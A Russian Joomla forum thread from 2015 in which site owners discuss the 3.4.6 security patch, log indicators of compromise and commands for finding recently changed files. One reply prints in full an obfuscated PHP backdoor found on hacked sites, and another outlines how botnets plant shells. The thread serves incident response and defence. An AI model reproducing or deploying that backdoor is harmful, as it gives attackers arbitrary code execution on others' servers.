0 Пользователей и 1 Гость просматривают эту тему.
  • 127 Ответов
  • 6459 Просмотров
*

Dmitriy50

  • Захожу иногда
  • 97
  • 4 / 11
  • TV
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #60 : 16.12.2015, 13:39:21 »
Вам не просто файлы почистить теперь надо, вам надо просканировать весь сайт на предмет стороннего кода.

Важно! Если кто видит у себя в логах
Код
JDatabaseDriverMysqli
или
Код
O:
это означает что вас уже взломали!
Искать требуется Вам теперь сторонний код на сайте, полностью сканировать и чистить, если хостинг и несколько сайтов то на всех соседних которые не разграничены по правам и пользователям.

Если бы знать как он выглядит ... этот "сторонний код" :-(
*

fsv

  • Живу я здесь
  • 2538
  • 370 / 2
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #61 : 16.12.2015, 13:40:50 »
Если после - то пытались взломать
ok. спасибо, так и думал, особо не напрягаясь. Озадачила цитата без вариантов, которую привел.
Веб-разработка: заказ.
*

flyingspook

  • Живу я здесь
  • 3588
  • 247 / 9
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #62 : 16.12.2015, 14:37:35 »
Это означает, что кто-то подменил строку User Agent. Сей факт подтверждает лишь факт атаки, но не взлома.
На уязвимом движке 99.99999*% это атака закончилась заливом шела. Если не настраивался сервер или еще какие работы не велись в плане безопасности, а это не ведется у более 90% пользователей.
*

jurassik

  • Давно я тут
  • 667
  • 50 / 1
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #63 : 16.12.2015, 14:58:17 »
а нет-ли плагина который уведомлял бы администратора по емайлу, о выходе новой версии установленных расширений и необходимости обновлении движка Joomla?
сам шучу - сам смеюсь
*

wishlight

  • Живу я здесь
  • 3820
  • 234 / 1
  • skype aqaus.com
*

rom_4

  • Захожу иногда
  • 87
  • 4 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #65 : 16.12.2015, 17:39:51 »
Цитировать
Признаком заражения может служить наличие в логах "JDatabaseDriverMysqli" и "O:" в User-agent запросов.

А если есть в логах JDatabaseDriverMysqli, что делать? Достаточно поставить заплатку или нет?[
*

wishlight

  • Живу я здесь
  • 3820
  • 234 / 1
  • skype aqaus.com
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #66 : 16.12.2015, 17:42:10 »
А если есть в логах JDatabaseDriverMysqli, что делать? Достаточно поставить заплатку или нет?[

По возможности проверить созданные и измененные файлы. Можно еще айболитом просканировать.
*

shweew

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #67 : 16.12.2015, 17:44:37 »
 Что конкретно искать то?
*

wishlight

  • Живу я здесь
  • 3820
  • 234 / 1
  • skype aqaus.com
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #68 : 16.12.2015, 17:50:56 »
Что айболит покажет проверить на наличие вредоносного кода. Ну и измененные файлы проверить. У кого есть ssh можно воспользоватся

Для проверки только php файлов.
Код
find /путь к сайту -name '*.php' -type f -mtime -1 -exec ls -al  {} \;

Всех

Код
find /путь к сайту -type f -mtime -1 -exec ls -al  {} \;

mtime -1 - дата минус 1 день
-name '*.php' - маска файла
*

Physicist

  • Глобальный модератор
  • 917
  • 185 / 0
  • Рябов Денис
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #69 : 16.12.2015, 18:26:26 »
Код
find /путь к сайту -name '*.php' -type f -mtime -1 -exec ls -al  {} \;
Это не всегда помогает, сейчас вредоносы достаточно умные, чтобы либо патчить имеющийся php файл с сохранением даты (filemtime/touch), либо создавать файл в уже существующей (под-под-...)директории, а дату создания файла устанавливать равной дате создания этой директории.
*

shweew

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #70 : 16.12.2015, 18:53:09 »
А в логах апача как то ещё, кроме ...JDatabaseDriverMysqli... отслеживается?
Или если есть в логе ...JDatabaseDriverMysqli... , а заплатка не стояла, то стопудово поломали?
*

flyingspook

  • Живу я здесь
  • 3588
  • 247 / 9
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #71 : 16.12.2015, 19:13:46 »
А в логах апача как то ещё, кроме ...JDatabaseDriverMysqli... отслеживается?
Или если есть в логе ...JDatabaseDriverMysqli... , а заплатка не стояла, то стопудово поломали?
Если нет ни каких доп. защит то да
В логах должны быть видны действия после вызова JDatabaseDriverMysqli ну и от них отталкиваясь видно до момента когда уже начнут шел использовать, потом только вызовы сторонних или движка сайта PHP файлов.

По логам искать вредоносный код не получиться, по ним только смотреть для анализа можно.
*

shweew

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #72 : 16.12.2015, 19:20:26 »
Ну и фиг с ними, откатил сайт на позавчера.
А базу тоже откатывать? До фига там у меня...
*

flyingspook

  • Живу я здесь
  • 3588
  • 247 / 9
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #73 : 16.12.2015, 19:23:59 »
Ну и фиг с ними, откатил сайт на позавчера.
А базу тоже откатывать? До фига там у меня...
У вас что бэкапы разные файлов и бд?
Базу проверить можно на предмет пользователей лишних и расширений не вами установленных, могли успеть залить и завести.
*

shweew

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #74 : 16.12.2015, 19:34:51 »
Да, у меня раздельные бэкапы.
В базе нового пользователя нет, приложений вроде бы тоже не отмечено, да и похерятся они (приложения) при откате сайта.
*

flyingspook

  • Живу я здесь
  • 3588
  • 247 / 9
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #75 : 16.12.2015, 19:56:46 »
Да, у меня раздельные бэкапы.
В базе нового пользователя нет, приложений вроде бы тоже не отмечено, да и похерятся они (приложения) при откате сайта.
Файлы да похерятся, а в бд запись останется если что то было установлено.
*

miminfo

  • Новичок
  • 14
  • 0 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #76 : 16.12.2015, 20:07:18 »
 а как быть  с 1.6   и 1.7?  (файлы для Joomla 1.5 и 2.5 не подходят)
*

voland

  • Легенда
  • 9762
  • 540 / 107
  • Эта строка съедает место на вашем мониторе
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #77 : 16.12.2015, 20:20:24 »
а как быть  с 1.6   и 1.7?  (файлы для Joomla 1.5 и 2.5 не подходят)
В них всё равно число дырок слишком большое.
Давно надо было обновить минимум до 2,5
*

shweew

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #78 : 16.12.2015, 20:42:49 »
Я не шибко разбираюсь в веб-программировании, потому вопрос: что делает этот запрос, который ...JDatabaseDriverMysqli...?
« Последнее редактирование: 16.12.2015, 20:52:23 от shweew »
*

voland

  • Легенда
  • 9762
  • 540 / 107
  • Эта строка съедает место на вашем мониторе
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #79 : 16.12.2015, 20:52:12 »
Позволяет выполнить любой код.
Совершенно любой.
*

Sergeyy

  • Захожу иногда
  • 147
  • 3 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #80 : 16.12.2015, 21:26:37 »
А в Joomla 2.5 нет такого classa JDatabaseDriverMysqli
да?
там JDatabaseMySQLi
Или Я что-то не так понимаю?
joomla 2.5
*

rom_4

  • Захожу иногда
  • 87
  • 4 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #81 : 16.12.2015, 21:43:53 »
смотрите логи. если ваш сайт "щупали" то в логах есть
*

mickymouse

  • Захожу иногда
  • 133
  • 8 / 1
  • Ушел в нирвану буду скоро!
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #82 : 16.12.2015, 22:21:28 »
Ух обновился вовремя, так как потом логи разрывались )))) от попыток!
Играю на нервах! Дорого!
*

maxpa

  • Захожу иногда
  • 65
  • 2 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #83 : 16.12.2015, 22:50:03 »
Вчера ночью пропатчил все сайты, сегодня смотрел логи. Нашел несколько строк с JDatabaseDriverMysqli. Время в логах когда файл еще не был пропатчен. В файлах J2,5 Айболит ничего  подозрительного не нашел, а в файлах J3 найден файлик site/libraries/joomla/exporter.php. У кого то есть подобное.
*

shweew

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #84 : 16.12.2015, 22:56:39 »
site/libraries/joomla/exporter.php
Нет такого.
*

maxpa

  • Захожу иногда
  • 65
  • 2 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #85 : 16.12.2015, 23:13:07 »
Вообщем проверил около 20 сайтов - все сайты, потенциально взломанные и работающие на J 3 имеют данный файл exporter.php. В файле всего 1 строка - <?php if (md5($_POST["password"]) == "4286e57cd610ccd917c0122b9ccf84c0") { preg_replace("\043\056\052\043\145", "\145\166\141\154\050\142\141\163\145\066\064\137\144\145\143\157\144\145\050'" . $_POST["code"] . "'\051\051\073", ""); } ?>
*

Филипп Сорокин

  • Сорокин Band
  • 1843
  • 150 / 4
  • разработчик.москва
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #86 : 17.12.2015, 06:14:40 »
Если Вы в логах сервера обнаружили запрос "JDatabaseDriverMysqli" ДО того по времени, как было поставлено обновление joomla-3.4.6, Это гарантированный взлом сайта.
На вашем сервере гарантированно был выполнен скрипт присланный в переменной $_POST!

Где можно почитать механику процесса? Почему взлом был произведён гарантированно, можете объяснить?
*

flyingspook

  • Живу я здесь
  • 3588
  • 247 / 9
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #87 : 17.12.2015, 10:29:22 »
Где можно почитать механику процесса? Почему взлом был произведён гарантированно, можете объяснить?
Вы взламывать собираетесь?  :laugh:
Механика уже давно одна и та же, ни чего нового.

-находится уязвимость
-боту или руками делается её выполнение
-заливается на прямую или со стороннего сервера файл для соединения
-через него заливаются шелы в разные папки по иерархи
-делается массово и взлом могут производить за раз не одна сеть ботнетов
-потом узнают про залитые файлы и их названия другие
-и они по ним пройдутся, как это было после первых турецких взломов с подменой index.php в 2009-2010г.г. которые несли массовые первые взломы движка 1.5.* в котором не было уязвимости

Обычно через 2-3 месяца названия файлов и где какой код встроен той или иной сеткой ботнетов узнают другие и начинают использовать эти возможности в своих интересах, в соседней теме описан код залитый которым залили шел и закрыли уязвимость сессий, заботливые хакеры, позаботились что бы ни кто другой не получил доступ к серверу.

Ну а использование взломанных сайтов очевидна
-слив бд
-рассылка спама
-ну и сам сервер в сеть ботнетов для дальнейших взломов, и про это уже ни кто из владельцев знать не будет

то что какие то ссылки появляются или коды бирж вставляют это уже не из сетей ботнетов, это остаточное явление

Почитайте, про механику поверхностно в интернете много написано, остальное поймете если разбираетесь в вопросе.
*

b2z

  • Глобальный модератор
  • 6936
  • 753 / 0
  • Разраблю понемногу
*

al707

  • Осваиваюсь на форуме
  • 35
  • 1 / 0
  • Тамиров Александр
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #89 : 17.12.2015, 12:50:26 »
Вот давайте тут не будем ещё и механику разбирать, а?
Почему?
Люблю изучать то, что считаю перспективным, делиться опытом, иногда помогать.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Проблема Joomla с большим количеством материала (статей)

Автор ruslan13

Ответов: 7
Просмотров: 293
Последний ответ 21.01.2018, 11:16:41
от ruslan13
Не устанавливается Joomla 3

Автор olikCZ

Ответов: 4
Просмотров: 110
Последний ответ 16.01.2018, 17:58:09
от olikCZ
Установить виджет на Joomla 3.8

Автор Civik35

Ответов: 4
Просмотров: 151
Последний ответ 16.01.2018, 07:53:43
от Arkadiy
Нумерация элементов в админке Joomla

Автор romagromov

Ответов: 0
Просмотров: 44
Последний ответ 15.01.2018, 14:29:50
от romagromov
Эффективность core Joomla

Автор ruslan13

Ответов: 69
Просмотров: 963
Последний ответ 12.01.2018, 16:20:55
от ruslan13